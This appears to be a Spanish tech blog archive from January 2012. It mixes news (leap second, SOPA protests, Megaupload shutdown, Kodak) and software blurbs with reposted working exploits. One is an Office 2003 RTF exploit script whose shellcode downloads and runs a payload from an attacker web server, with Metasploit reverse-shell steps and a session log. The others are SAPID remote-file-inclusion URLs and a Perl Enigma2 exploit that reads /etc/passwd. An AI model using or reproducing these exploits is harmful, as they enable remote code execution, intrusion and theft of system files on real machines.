jueves, 19 de enero de 2012

Aplazada hasta 2015 la decisión sobre el sistema de medición del tiempo



La Unión Internacional de Telecomunicaciones (UIT) aplazó hoy hasta 2015 la decisión sobre si mantiene o elimina el segundo intercalar o segundo adicional, la fracción de tiempo se agrega cada cierto número de años para mantener la hora sincronizada con la rotación de la Tierra.
Fuentes de la UIT, organismo dependiente de Naciones Unidas, informaron a EFE de que el aplazamiento, adoptado en el marco de la Asamblea de Radiocomunicaciones que se celebra estos días en Ginebra, se debe a que "algunos países argumentaron que no tenían elementos suficientes para tomar una decisión definitiva".
Estos países pidieron más tiempo para poder realizar estudios complementarios que permitan llegar a una conclusión dentro de tres años en el seno de la UIT, cuya intención es que cualquier posible cambio o mantenimiento de la política actual se haga por consenso.
El eventual cambio tiene calado científico e histórico, ya que hasta ahora es la "hora solar" -marcada por la rotación de la Tierra sobre su propio eje y su órbita alrededor del sol- la que sirve para medir el tiempo en función de las observaciones astronómicas.
Pero la rotación de la tierra experimenta variaciones causadas por la disminución de su velocidad y por eventos como terremotos o erupciones volcánicas, por lo que cada cierto tiempo se debe agregar un segundo a la hora de los relojes atómicos, de una extraordinaria precisión, en los que se basa el Tiempo Universal Coordinado (TUC).
Es la misma lógica detrás de los años bisiestos, que permiten mantener el tiempo sincronizado con el sol, aunque nadie habla por el momento de replantear su existencia, ya que el impacto de los 29 de febrero es mucho mayor que el de los segundos adicionales.
La propuesta de eliminar el segundo adicional, defendida entre otros por EEUU y rechazada por el Reino Unido, Canadá y China, busca una estandarización del tiempo, que evitaría, por ejemplo, el desfase de los sistemas de posicionamiento global (GPS) y el TUC.
El sistema GPS apareció en la década de 1980 y entonces se consideró que era demasiado complicado introducir el segundo intercalar, porque causaría errores, de modo que se decidió que funcionara con su propia hora, razón por la que actualmente tiene una diferencia de entre 15 y 17 segundos con respecto al TUC.
La eliminación de ese segundo tampoco requeriría, como ocurre ahora, ajustar los relojes atómicos, ni los sistemas de telecomunicaciones e informáticos cada vez que se agrega un segundo a un año, argumentaron ante la UIT los partidarios el cambio.
"Esos ajustes crean un problema porque deben hacerse manualmente ya que no se puede predecir cuándo tendrán que hacerse. Sólo se puede saber un par de meses antes y siempre hay un margen de error, así que hay que hacer pruebas posteriores", dijo el jefe de la Oficina de Frecuencias del Centro Nacional de Estudios Espaciales de Francia, Vincent Meens.
"Es imposible predecir en qué año se deberá agregar un segundo intercalar. A veces hay un segundo adicional cada año o podemos estar tres o cuatro años sin él", explicó.
No obstante, Meens reconoció que con esta medida habrá "una desviación de la hora de la Tierra con respecto a la hora atómica, que será más o menos de 1 minuto con 30 segundos por siglo".
Es decir, cada milenio la desviación sería de unos 15 minutos, un problema que, según los defensores de la reforma, podría solucionarse insertando un minuto adicional cada 70 años.

4.5 millones de personas se unieron a la petición de Google en contra de SOPA



Google se une a la protesta con la leyenda "Fin a la piratería, No la libertad", petición que pide a la gente protestar por la lucha contra dos leyes en contra de la piratería de que deben ser votadas por el Senado y el Congreso de los Estados Unidos


Washington.- Google se une a la protesta con la leyenda "Fin a la piratería, No la libertad", petición que pide a la gente protestar por la lucha contra dos leyes en contra de la piratería de que deben ser votadas por el Senado y el Congreso de los Estados Unidos.


"Millones de estadounidenses se oponen a SOPA y PIPA porque estas leyes censuran Internet y desaceleran el crecimiento económico en los EU," dice la petición. "Firma esta petición instando al Congreso a votar NO a la PIPA y SOPA antes de que sea demasiado tarde".


En el transcurso del día, millones de personas firmaron la petición de Google. "El último número que obtuvimos fue a las 4:30 pm", dijo el portavoz de Google, Christine Chen. "Estábamos llegando a los 4,5 millones de firmas y contando."


Este búscador-gigante está demostrando que esta al unísono, con cientos de otras personas, grupos y sitios Web que enviaron sus propias peticiones, escribieron cartas al gobierno de los EU, o suspendieron sus actividades en protesta por las leyes anti-piratería . Entre los aliados de Google estan Facebook, AOL, Wikipedia, Amazon, Twitter y Firefox.


"La lucha contra la piratería en Internet es importante", escribió Google en la petición. "La manera más efectiva para cerrar páginas web piratas es a través de la legislación específica que corte su financiamiento. No hay necesidad de hacer que las redes sociales, blogs y motores de búsqueda censuren Internet o minen las leyes existentes que han permitido a el desarrollo de la Web, creando millones de empleos en EU".


Hay indicios de que las protestas de PIPA y SOPA están funcionando. Una gran cantidad de miembros del Congreso y los senadores de ambos lados de los partidos han anunciado que votaran en contra o votaran para enmendar la Ley.

El FBI cierra la web de descargas Megaupload y detiene a sus dueños


En lo que el Departamento de Justicia estadounidense definió ayer como una de las mayores operaciones contra la piratería en la Red de la historia de Estados Unidos, la Fiscalía pública presentó cargos contra los siete administradores de las empresas Megaupload Limited y Vestor Limited, y cerró las webs asociadas para alojar contenidos. Cuatro de ellos, incluido el fundador, Kim Schmitz (alias Kim Dotcom), fueron detenidos en Nueva Zelanda. Se les acusa de haber tomado parte en una conspiración criminal para lucrarse con la distribución ilegal de contenido protegido por las leyes de propiedad intelectual.
El Departamento de Justicia y su cuerpo policial, el FBI, alegan que los administradores de esas empresas provocaron daños a la industria del entretenimiento por valor de 386 millones de euros en concepto de material difundido de forma ilícita. Adhiriendo anuncios publicitarios a sus páginas de alojamiento y descarga, amasaron 135 millones de euros, según la demanda presentada ante la corte federal del Distrito Este de Virginia.
Megaupload.com, que asegura que ha tenido más de 1.000 millones de visitas desde su creación en 2004 y que cuenta con más de 180 millones de usuarios registrados en todo el mundo, era ayer inaccesible en EE UU y en otros países, incluida España, debido a la intervención de sus servidores por parte del FBI. La operación afectó a un total de 18 dominios, entre los que se encuentran Megavideo, Megaclick, Megaworld, Megalive, Megapix, Megacar, Megafund, Megakey, Megamovie, y otros.
El Gobierno de EE UU asegura en la demanda, a la que tuvo acceso este diario, que Megaupload y sus sitios web asociados forman una “Mega Conspiración, una organización criminal de dimensiones mundiales cuyos miembros tomaron parte en actos de infracciones criminales de los derechos de autor y en lavado de dinero a escala masiva”.
“Desde septiembre de 2005 Megaupload.com ha sido empleado por los acusados y otros miembros y asociados de la Mega Conspiración para reproducir y distribuir de forma intencional muchos millones de copias ilícitas de obras diversas, incluidas películas, programas de televisión, grabaciones musicales, libros electrónicos, imágenes, videojuegos y otros programas informáticos”, añade el listado de cargos.
La demanda aceptada por el gran jurado incluye cinco cargos: uno por conspiración para cometer infracciones de los derechos de autor, otro por conspiración para lavado de dinero, dos por infracción criminal de los derechos de autor y un último cargo por conspiración para cometer extorsión, al entender que los acusados se comportaban como una banda criminal.
Un gran jurado en esa corte aceptó los cargos contra siete personas relacionadas con Megaupload. Fueron arrestados en Nueva Zelanda, por las autoridades locales de aquel país, Kim Schmitz (alias Kim Dotcom), ciudadano de Finlandia y de Alemania, fundador de Megaupload Limited y, según la demanda del Gobierno de EE UU, “jefe de la Mega Conspiración”; Fin Batato, ciudadano alemán y jefe de publicidad comercial y de ventas de la misma empresa; Mathias Ortmann, alemán y jefe técnico de la compañía, y Bram van der Kolk, holandés y programador de Megaupload y otros sitios asociados.
También se han presentado cargos contra Julius Bencko, ciudadano de Eslovaquia y director gráfico; Sven Echternach, alemán y director de desarrollo de negocio; Adrus Nomm, de Estonia y jefe de programación, y Bram van der Kolk, holandés y programados de Megaupload y otras webs. Los agentes del FBI registraron además las cuentas bancarias de esos administradores y examinaron los servidores de Megaupload, para recoger evidencias de la difusión de contenido supuestamente pirateado.
La demanda del Gobierno se hizo pública ayer, a través de las oficinas de la corte federal del Distrito Este de Virginia y un día después de que numerosas páginas de EE UU protestaran por dos proyectos de leyque le permitirían al Gobierno cerrar páginas alojadas en EE UU que permitan las descargas de contenido protegido por derechos de autor.
Aunque el miércoles Megaupload protestó en su página principal contra esas dos propuestas legislativas, esa operación del FBI no está relacionada con ellas o con la campaña de protesta. El FBI efectuó 20 registros dentro de EE UU, y también en otros ochos países. En total, congeló bienes asociados a la empresa y sus gerentes por valor de 38 millones de euros.
Las oficinas centrales de Megaupload se hallan en Hong Kong, según información corporativa, aunque sus gerentes vivían en Nueva Zelanda. Los fiscales del Gobierno de EE UU que presentaron los cargos se refirieron a los administradores en su demanda como “megaconspiradores”. “A cambio de pagos, la Mega Conspiración ofrece una rápida reproducción y distribución de copias ilícitas de material protegido por derechos de autor en servidores alojados en todo el mundo”, asegura la demanda.
En la demanda se alega que los acusados empleaban Megaupload de un modo que favorecía la difusión de material ilegal. Aseguran los fiscales que los administradores de esa web borraban contenido que no se descargara con frecuencia, imposibilitando el uso del portal para el almacenamiento de documentos personales. En lugar de eso, facilitaban la distribución permanente de material más demandado. Según la investigación, fomentaban la publicación de películas y canciones de forma ilegal para registrar un mayor número de visitas y, a la larga, obtener cuantiosos ingresos por publicidad.
En total los acusados se enfrentan a 50 años de cárcel si se les aplica la pena máxima. Fue el FBI el que inició la investigación, a través de su Centro de Coordinación Nacional para la Protección de la Propiedad Intelectual. Para ello recibió ayuda de la policía de Nueva Zelanda, Hong Kong, Holanda, Reino Unido, Alemania, Canadá y Filipinas.
Fuente: elpais



miércoles, 18 de enero de 2012

Repudio en redes sociales a Ley SOPA


El rechazo contra la Ley para Detener la Piratería en Línea (SOPA) y Ley de Protección de la Propiedad Intelectual (PIPA, por sus siglas en inglés) se reflejó en las redes sociales, donde los cibernautas se dieron a la tarea de instruir y opinar sobre las polémicas leyes y sus repercusiones en el desarrollo de Internet.

TWITTER
Los hashtag #STOPSOPA (Paren a SOPA), #BLACKOUTSOPA (Apagón a SOPA) y #SOPA y otros relacionados siguen sumando tuits, este miércoles suman en conjunto más de 2.4 millones, según información proporcionada por Twitter.
Algunos usuarios cambiaron incluso sus avatares (fotos de usuarios) por otro en los que expresan la consigna.
Personajes como Mark Zuckerberg y el millonario de los medios de comunicación Rupert Murdoch, presidente de News Corporation expresario sus opiniones en Twitter. Mientras el primero consideró que SOPA y PIPA frenaban el desarrollo de Internet, el segundo llamó a Google “el líder de la piratería” y aseguró que la “industria del cine está en gran peligro”.

FACEBOOK
Además de que su fundador se pronunció en contra de las leyes SOPA y PIPA, los usuarios habilitaron diversas páginas de repudio contra las iniciativas, entre ellas “No a la Ley SOPA (Stop Online Piracy Act) Not SOPA Act”, que ha sido del agrado de más de 20,000 personas y suma cientos de comentarios.
“No a La Ley Sopa” y “NO A LA LEY S.O.P.A” son otras de las cuentas con más de 30,000 seguidores en conjunto.

YOUTUBE
El popular sitio de videos lanzó un “doodle” en contra de la Ley SOPA, que sólo se puede ver en algunos países como Estados Unidos. Del ícono de YouTube, cuelga una letrero de fondo negro con letras blancas, la ilustración muestra un mensaje claro, sencillo y contundente: “Alto a la censura” (“STOP CENSORSHIP”).
Además, diversos usuarios, entre ellos el grupo Anonymous, crearon videos explicativos sobre los posibles alcances de ambos proyectos de ley. Algunos de estos alcanzan el medio millón de visitas.

Foto-Mosaik 5.8.0


Foto-Mosaik te permite crear mosaicos a partir de tus fotos favoritas, de forma muy rápida y sorprendentemente sencilla.
El programa incorpora una interfaz a modo de asistente que te va guiando paso a paso a través de todo el proceso: elegir la base de datos de teselas (las pequeñas fotos que conforman la imagen final), seleccionar la foto que quieres convertir a mosaico y configurar algunas otras opciones como número de fotos a usar y número de veces que se puede repetir cada tesela.
Lógicamente, a mayores valores, mayor calidad en el mosaico resultante. También tiene mucha importancia que cuentes con un gran número de fotos con las que crear el mosaico. El resto es cuestión de un simple clic, y los resultados son francamente satisfactorios (mira, por ejemplo, la galería de la web del autor).

Winamp 5.622 Full



Winamp es un reproductor de audio y vídeo muy práctico, funcional y con un vistoso aspecto.
Winamp, el famoso e histórico reproductor de Nullsoft, es ahora capaz de reproducir con soltura prácticamente todos los formatos de audio y vídeo, lógicamente, siempre y cuando dispongas del codec instalado.
La compatibilidad, la gran cantidad de extensiones y pieles disponibles, la versatilidad y el resto de cualidades de Winamp le convierten en un firme candidato a convertirse en tu reproductor multimedia favorito, y no sólo en tu casa. Gracias a Winamp Remote, también podrás disfrutar de la música del ordenador de tu casa desde cualquier PC conectado a Internet.
La piel Bento, muy práctica y con cierta inspiración en iTunes, además te garantiza que tendrás todo a mano (ecualizador, biblioteca multimedia, lista de reproducción) sin ventanas flotantes, como ocurría con las versiones anteriores de Winamp.
Pruébalo, no te arrepentirás.

avast! Free Antivirus 6.0.1367


Ocho escudos antivirus y antimalware

avast! Free Antivirus es un antivirus gratuito y sin publicidad. Con sus ocho escudos, mantiene el ordenador constantemente a salvo de una gran variedad de amenazas.
Para una protección adicional, avast! Free Antivirus muestra la reputación de una página web en tu navegador y carga los programas desconocidos en un espacio aislado llamado Sandbox.

Las novedades de la versión 6

La sexta edición de avast! Free Antivirus presenta pocos cambios estéticos en comparación con la anterior, pero amplía aún más el abanico de la protección gratuita.
A los escudos de la versión 5 se añaden los de scripts y comportamiento. Y con el módulo AutoSandbox, avast! Free Antivirus impide que programas potencialmente dañinos puedan afectar el sistema.

avast! WebRep: conoce la reputación de las páginas que visitas

La gran novedad de avast! Free Antivirus 6 es WebRep, el complemento para Firefox, Chrome e Internet Explorer que comprueba la reputación de una página a partir de las valoraciones de los usuarios.
Tres barras coloreadas indican la calidad del sitio y hay recuadros para clasificar el sitio web en distintas categorías. Es un sistema eficaz y abierto a las contribuciones de los usuarios.
Lo cierto es que ningún antivirus gratuito ofrece tanto como avast! Free Antivirus. Traducido y apoyado por una inmensa comunidad de usuarios, se postula como el antivirus gratuito por excelencia.

Múltiples vulnerabilidades en Wireshark


Wireshark ha publicado tres boletines de seguridad informando de múltiples vulnerabilidades que afectan a las ramas 1.4.x y 1.6.x.

Wireshark es una aplicación de auditoría orientada al análisis de tráfico en redes. Su popularidad es muy elevada, puesto que soporta una gran cantidad de protocolos y es de fácil manejo. Además Wireshark es software libre (sujeto a licencia GPL) y se ejecuta sobre la mayoría de sistemas operativos Unix y compatibles, así como en Microsoft Windows.

A continuación, los identificativos de los boletines publicados y una breve descripción.

wpna-sec-2012-01: Existe un problema a la hora de comprobar los tamaños de registros cuando se procesan muchos formatos de captura. Si la víctima abre estas capturas, el programa dejaría de funcionar.

wnpa-sec-2012-02: Existe un error de comprobación en la función "bytes_to_hexstr_punct" localizada en el fichero "epan/to_str.c" que podría causar una referencia a puntero nulo. Un atacante remoto podría aprovechar esto para causar una denegación de servicio a través del envío de un paquete especialmente manipulado.

wnpa-sec-2012-03: Existe un error de desbordamiento de memoria en el archivo "/epan/dissectors/packet-rlc.c" del disector RLC. Un atacante remoto podría causar una denegación de servicio a través de un fichero especialmente manipulado.

Las vulnerabilidades se han corregido en las versiones 1.4.11 y 1.6.5 por lo que se recomienda la actualización desde

Más información:

wnpa-sec-2012-01

wnpa-sec-2012-02

wnpa-sec-2012-3

Múltiples fallos de seguridad en Mambo CMS


Larry W. Cashdollar ha publicado tres problemas de seguridad hallados en el CMS Mambo.

Mambo es un popular sistema de portales CMS (Content Management System o Sistema de Gestión de Contenidos) basado en el lenguaje de programación PHP y base de datos de código abierto, para el que existen gran cantidad de módulos y componentes adicionales.

El primero de los fallos hace referencia al método empleado por Mambo para almacenar las diferentes contraseñas empleadas por el CMS.

En primer lugar, el programa almacena las contraseñas de la base de datos MySql en texto claro en la ruta raíz de la web. Esto, en principio, puede ser leído por cualquier usuario local.

Por otro lado, Mambo también almacena el hash de la contraseña de administrador en el fichero "configuration.php" y recomienda los permisos 644 para este archivo. Para más seguridad, deberían ser permisos 600 y ponerle como dueño al usuario sobre el que corre el servidor.

La segunda de las vulnerabilidades reportadas podría causar una denegación de servicio. Al parecer, no es necesario autenticarse para poder iniciar el proceso de subida de ficheros. Aunque el fichero no será almacenado, se consumirán recursos y ancho de banda del sistema.

Finalmente la última de las vulnerabilidades reportadas hace referencia a una revelación de ruta a través del error que aparece al acceder a ciertos ficheros incluidos en la distribución

La versión afectada por estas vulnerabilidades sería la 4.6.5 aunque existe la posibilidad de otras versiones afectadas.

Más información:

Mambo CMS 4.6.5 Denial Of Service / Disclosure

miércoles, 11 de enero de 2012

iPad sobrevive caída libre desde el espacio y aterriza cerca del area 51

G-Form está muy segura de sus "estuches extremos para dispositivos electrónicos". Tanto así, que la compañía lanzó recientemente un iPad desde el espacio.

El gadget sobrevivió la caída libre de 100.000 pies de altura.

Protegido solo por el protector "Extreme Edge" de G-Form, el iPad aterrizó en un accidentado terreno de Nevada en condiciones óptimas de funcionamiento.

http://youtu.be/X4xNcF6T7Is

Lanzan sistema operativo BlackBerry 7.1 descarga



MÉXICO, D.F., enero 10 (Hugo Arce / EL UNIVERSAL).- La empresa canadiense Research In Motion (RIM) presentó la versión 7.1 de su sistema operativo BlackBerry, luego de que en 2011 Android se coronara como el sistema preferido por los usuarios, seguido por Symbian y el iOS de Apple.


RIM aseguró que el 7.1 cuenta con una amplia gama de mejoras de software, al tiempo que presentó actualizaciones de las aplicaciones BBM (BlackBerry Messenger), BlackBerry Traffic y BlackBerry Travel.

BlackBerry 7.1 empezará a distribuirse por parte de las compañías operadoras en todo el mundo a partir de hoy y durante las próximas semanas.

Las actualizaciones de BBM, Traffic y Travel estarán disponibles en el BlackBerry App World desde hoy.

"Las actualizaciones anunciadas permiten mejorar aún más la experiencia móvil y hacer que la vida sea más fácil", dijo Mike Lazaridis, Presidente y Co-CEO en Research In Motion.

El sistema operativo BlackBerry 7.1 incorpora una nueva función llamada BlackBerry Tag: con solo tocar levemente entre sí los teléfonos BlackBerry habilitados con NFC, los usuarios pueden compartir contenido. Pueden invitar instantáneamente a un amigo a BBM, intercambiar información de contacto, documentos, URLs, fotografías y otros contenidos multimedia.

Otras funciones permiten a los usuarios personalizar aún más su experiencia con soporte para avatares animados, una docena de nuevos emoticones para animar las conversaciones, y la habilidad de personalizar las burbujas de chat con diferentes colores.

Además, la nueva aplicación BBM permite a los usuarios agregar mensajes personales de hasta 160 caracteres en sus Perfiles online, más del doble de la longitud permitida en versiones previas. Los usuarios también pueden ahora configurar la fotografía de su avatar BBM directamente desde la aplicación Cámara: solo es necesario tomar la foto y seleccionar "Establecer como BBM Display Picture" en el menú.

Por otro lado, con la versión 7.1, los usuarios pueden convertir sus teléfonos inteligentes BlackBerry en un hotspot móvil que puede compartirse con hasta 5 dispositivos habilitados con WiFi, como laptops y tablets.

La actualización 7.1 también cuenta con soporte para servicios de llamada WiFi implementados por las compañías operadoras (UMA/GAN donde estén disponibles), lo que permite a los usuarios realizar llamadas WiFi desde sus teléfonos inteligentes BlackBerry sin consumir sus minutos de tiempo en aire.

Con la aplicación gratuita BlackBerry Traffic (versión 3.0), es posible determinar el tiempo estimado de llegada del usuario a su destino según las condiciones actuales del tráfico e incluye guía de voz paso a paso de manos libres.

Y con Travel es posible planificar, reservar, manejar y compartir actividades de viaje. La nueva versión añade soporte para ofertas relacionadas, como hoteles y renta de automóvil, o para reservar servicios de limusina desde y hacia el aeropuerto.

BlackBerry Maps es una aplicación que viene pre-instalada en los teléfonos BlackBerry y también fue mejorada con la actualización a 7.1. Al iniciar la nueva aplicación BlackBerry Maps, los usuarios pueden descubrir ofertas especiales, cupones y descuentos de proveedores en los alrededores.

Los usuarios pueden aprovechar de inmediato las ofertas con solo hacer clic para llamar al proveedor o hacer clic para saber la mejor ruta al lugar donde está disponible la oferta.

Los usuarios con teléfonos BlackBerry Curve 9360 o 9380 encontrarán ahora radio FM.

Para más información acerca de la actualización del sistema operativo BlackBerry 7.1, visita www.blackberry.com/bb7 y www.blackberry.com/appworld.

Kodak cambia su estructura de negocio para convertirse en una empresa digital



La empresa de productos y servicios fotográficos Kodak, que en el último año se ha desplomado un 90 % en bolsa, en medio de los rumores sobre su posible bancarrota, anunció hoy un cambio en su estructura de negocio con el que busca acelerar su transformación en una empresa digital.

La firma con sede en Rochester (Nueva York) y fundada hace ya más de 130 años reveló en un comunicado que ha reorganizado su negocio para reducir las divisiones en las que se compone desde tres hasta dos, que ahora serán la comercial y la del consumidor.

Esas dos unidades de negocio estarán bajo el mando de una nueva oficina de operaciones dirigida por Philip Faraci y Laura Quatela, que ya comparten los cargos de presidentes y directores de operaciones de la empresa fotográfica.

"Mientras completamos la transformación de Kodak en una empresa digital, nuestro mercado será en el futuro muy diferente al del pasado y necesitamos organizarnos para mantener esa evolución", dijo el consejero delegado de la compañía, el español Antonio Pérez.

El máximo responsable de Kodak detalló que esta nueva estructura simplifica la organización de la empresa y permitirá distribuir sus "recursos de una manera más productiva, seguir reduciendo significativamente" los "costes administrativos" y mejorar la "eficiencia".

El anuncio provocó que unas dos horas después del inicio de la sesión en la Bolsa de Nueva York (NYSE), las acciones de esa empresa se dispararan un 30,72 % para cambiarse por 52 centavos.

Pese a ese fuerte avance, la compañía sufrió una caída del 90,89 % en los últimos doce meses, afectada en gran medida por la transformación del sector hacia la fotografía digital, que le forzó a poner en venta más de 1.100 patentes tecnológicas para digitalizar imágenes con el fin de aumentar su capital.

Sin embargo, según el diario The Wall Street Journal la compañía ha sido incapaz de vender esas patentes, por lo que publicó a principios de año que Kodak se declarará en suspensión de pagos en las próximas semanas.

La noticia provocó un desplome de cerca del 30 % el día en que se conoció, como ya ocurrió en septiembre pasado, cuando ese mismo diario publicó también los supuestos planes de Kodak de declararse en suspensión de pagos.

La continua depreciación de las acciones de la firma llevó también a principios de enero a la Bolsa de Nueva York a advertirle que podría dejar de cotizar en el parqué neoyorquino si no consigue en los próximos seis meses que sus títulos cierren por encima de un dólar como requiere ese mercado.

Via Yahoo

lunes, 9 de enero de 2012

Microsoft Office 2003 Home/Pro 0day

#!/usr/bin/python

#
# Note from the Exploit-DB team: This might be the same bug as:
# https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/ms10_087_rtf_pfragments_bof.rb
#

#-----------------------------------------------------------------------------------#
# Exploit: Microsoft Office 2003 Home/Pro 0day - Tested on XP SP1,2.3 #
# Authors: b33f (Ruben Boonen) && g11tch (Chris Hodges) #
#####################################################################################
# One shellcode to rule them all, One shellcode to find them, One shellcode to #
# bring them all and in the darkness bind them!! #
# #
# Greetings: offsec, corelan, setoolkit #
#####################################################################################
# (1) root@bt:~/Desktop/office# ./office2003.py #
# root@bt:~/Desktop/office# mv evil.doc /var/www/ #
# #
# (2) msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.111.132 LPORT=9988 X #
# > /var/www/magic.exe #
# #
# (3) msf exploit(handler) > exploit #
# #
# [*] Started reverse handler on 192.168.111.132:9988 #
# [*] Starting the payload handler... #
# [*] Sending stage (752128 bytes) to 192.168.111.128 #
# [*] Meterpreter session 1 opened (192.168.111.132:9988 -> 192.168.111.128:1073)#
# at 2012-01-08 18:46:26 +0800 #
# #
# meterpreter > ipconfig #
# #
# MS TCP Loopback interface #
# Hardware MAC: 00:00:00:00:00:00 #
# IP Address : 127.0.0.1 #
# Netmask : 255.0.0.0 #
# #
# AMD PCNET Family PCI Ethernet Adapter - Packet Scheduler Miniport #
# Hardware MAC: 00:0c:29:6c:92:42 #
# IP Address : 192.168.111.128 #
# Netmask : 255.255.255.0 #
#-----------------------------------------------------------------------------------#

import binascii

filename = "evil.doc"

#-----------------------------------------------------------------------------------#
# File Structure #
#-----------------------------------------------------------------------------------#
file = (
"{\\rt##{\shp{\sp}}{\shp{\sp}}{\shp{\sp}}{\shp{\*\shpinst\shpfhdr0\shpbxcolumn\s"
"hpbypara\sh pwr2}{\sp{\sn {}{}{\sn}{\sn}{\*\*}pFragments}{\*\*\*}{\sv{\*\*\*\*\*"
"\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*\*}9;2;ffffffffff")

#-----------------------------------------------------------------------------------#
# Open raw socket to download payload to parent directory as "a.exe" #
# ==> cmd execute "a.exe" #
#-----------------------------------------------------------------------------------#
magic = (
"\x65\x62\x37\x37\x33\x31\x63\x39\x36\x34\x38\x62\x37\x31\x33\x30"
"\x38\x62\x37\x36\x30\x63\x38\x62\x37\x36\x31\x63\x38\x62\x35\x65"
"\x30\x38\x38\x62\x37\x65\x32\x30\x38\x62\x33\x36\x36\x36\x33\x39"
"\x34\x66\x31\x38\x37\x35\x66\x32\x63\x33\x36\x30\x38\x62\x36\x63"
"\x32\x34\x32\x34\x38\x62\x34\x35\x33\x63\x38\x62\x35\x34\x30\x35"
"\x37\x38\x30\x31\x65\x61\x38\x62\x34\x61\x31\x38\x38\x62\x35\x61"
"\x32\x30\x30\x31\x65\x62\x65\x33\x33\x34\x34\x39\x38\x62\x33\x34"
"\x38\x62\x30\x31\x65\x65\x33\x31\x66\x66\x33\x31\x63\x30\x66\x63"
"\x61\x63\x38\x34\x63\x30\x37\x34\x30\x37\x63\x31\x63\x66\x30\x64"
"\x30\x31\x63\x37\x65\x62\x66\x34\x33\x62\x37\x63\x32\x34\x32\x38"
"\x37\x35\x65\x31\x38\x62\x35\x61\x32\x34\x30\x31\x65\x62\x36\x36"
"\x38\x62\x30\x63\x34\x62\x38\x62\x35\x61\x31\x63\x30\x31\x65\x62"
"\x38\x62\x30\x34\x38\x62\x30\x31\x65\x38\x38\x39\x34\x34\x32\x34"
"\x31\x63\x36\x31\x63\x33\x65\x38\x39\x32\x66\x66\x66\x66\x66\x66"
"\x35\x66\x38\x31\x65\x66\x39\x38\x66\x66\x66\x66\x66\x66\x65\x62"
"\x30\x35\x65\x38\x65\x64\x66\x66\x66\x66\x66\x66\x36\x38\x38\x65"
"\x34\x65\x30\x65\x65\x63\x35\x33\x65\x38\x39\x34\x66\x66\x66\x66"
"\x66\x66\x33\x31\x63\x39\x36\x36\x62\x39\x36\x66\x36\x65\x35\x31"
"\x36\x38\x37\x35\x37\x32\x36\x63\x36\x64\x35\x34\x66\x66\x64\x30"
"\x36\x38\x33\x36\x31\x61\x32\x66\x37\x30\x35\x30\x65\x38\x37\x61"
"\x66\x66\x66\x66\x66\x66\x33\x31\x63\x39\x35\x31\x35\x31\x38\x64"
"\x33\x37\x38\x31\x63\x36\x65\x65\x66\x66\x66\x66\x66\x66\x38\x64"
"\x35\x36\x30\x63\x35\x32\x35\x37\x35\x31\x66\x66\x64\x30\x36\x38"
"\x39\x38\x66\x65\x38\x61\x30\x65\x35\x33\x65\x38\x35\x62\x66\x66"
"\x66\x66\x66\x66\x34\x31\x35\x31\x35\x36\x66\x66\x64\x30\x36\x38"
"\x37\x65\x64\x38\x65\x32\x37\x33\x35\x33\x65\x38\x34\x62\x66\x66"
"\x66\x66\x66\x66\x66\x66\x64\x30\x36\x33\x36\x64\x36\x34\x32\x65"
"\x36\x35\x37\x38\x36\x35\x32\x30\x32\x66\x36\x33\x32\x30\x32\x30"
"\x36\x31\x32\x65\x36\x35\x37\x38\x36\x35\x30\x30")

#------------------------------------------------------------------------------------------------------------------------------#
# Two versions of office 2003 floating around: #
# (1) Standalone version, (2) XP Service Pack upgrade #
################################################################################################################################
# Unfortunatly though the exploit works perfectly for both versions they require different pointers to ESP... #
# #
# (1) 0x30324366 - CALL ESP - WINWORD.exe => "\x36\x36\x34\x33\x33\x32\x33\x30" #
# => http://download.microsoft.com/download/6/2/3/6233A257-16BD-4C8D-BF4C-6FA59AF9213A/OfficeSTD.exe #
# #
# (2) 0x30402655 - PUSH ESP -> RETN - WINWORD.exe => "\x35\x35\x32\x36\x34\x30\x33\x30" #
# => http://download.microsoft.com/download/7/7/8/778493c2-ace3-44c5-8bc3-d102da80e0f6/Office2003SP3-KB923618-FullFile-ENU.exe #
#------------------------------------------------------------------------------------------------------------------------------#

EIP = "\x36\x36\x34\x33\x33\x32\x33\x30" #should ascii convert the Little Endian pointer

filler = "\x30\x30\x30\x30\x38\x30\x37\x63"*2 + "\x41"*24 + "\x39\x30"*18

buffer = "\x23"*501 + "\x30\x35" + "\x30"*40 + EIP + filler + magic

#-----------------------------------------------------------------------------------#
# Since we are downloading our payload from a remote webserver there are no #
# restrictions on payload size or badcharacters... #
#-----------------------------------------------------------------------------------#

URL = "http://192.168.111.132/magic.exe"
binnu = binascii.b2a_hex(URL)

URL2 = "00"
nxt="{}}}}}}"
nxt+="\x0d\x0a"
nxt+="}"

textfile = open(filename , 'w')
textfile.write(file+buffer+binnu+URL2+nxt)
textfile.close()

SAPID 1.2.3 Stable Remote File Inclusion Vulnerability

# Exploit Title: SAPID Stable (RFI)
# Google Dork: tanyakan pada dan pemula :D
# Date: January 08 2011
# Author: Opa Yong
# Software Link: http://sourceforge.net/projects/sapid/files/sapid-cms/
# Version: SAPID 1.2.3 Stable
# Tested on: Windows XP Home Edition SP2


@POC: http://127.0.1/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=[webshell.txt?]
@POC: http://127.0.1/usr/extensions/get_infochannel.inc.php?root_path=[webshell.txt?]


Pesan: Jangan pernah mengaku diri anda hacker,lebih baik orang yg di sekitar anda yg mengaku anda itu adalah hacker.


Special thanks for Dan Pemula

Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure

#!/usr/bin/perl
#
# Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote root file disclosure exploit
##
# Author: Todor Donev
# Email me: todor.donev@@gmail.com
# Platform: Linux
# Type: remote
##
# Gewgle Dork: "Enigma2 movielist" filetype:rss
##
#
# Enigma2 is a framebuffer-based zapping application (GUI) for linux.
# It's targeted to real set-top-boxes, but would also work on regular PCs.
# Enigma2 is based on the Python programming language with a backend
# written in C++. It uses the [LinuxTV DVB API], which is part of a standard linux kernel.
#
# Enigma2 can also be controlled via an Enigma2:WebInterface.
##
# Thanks to Tsvetelina Emirska !!
##
use LWP::Simple;
$t = $ARGV[0];
if(! $t) {usg();}
$d = $ARGV[1];
if(! $d) {$d = "/etc/passwd";}
my $r = get("http://$t/web/about") or exit;
print "[+] Enigma2 Webinterface 1.7.x 1.6.x 1.5.x remote exploit\n";
print "[+] Target: $t\n";
if ($r =~ m/(.*)<\/e2webifversion>/g){
print "[+] Image Version: $1\n";
}
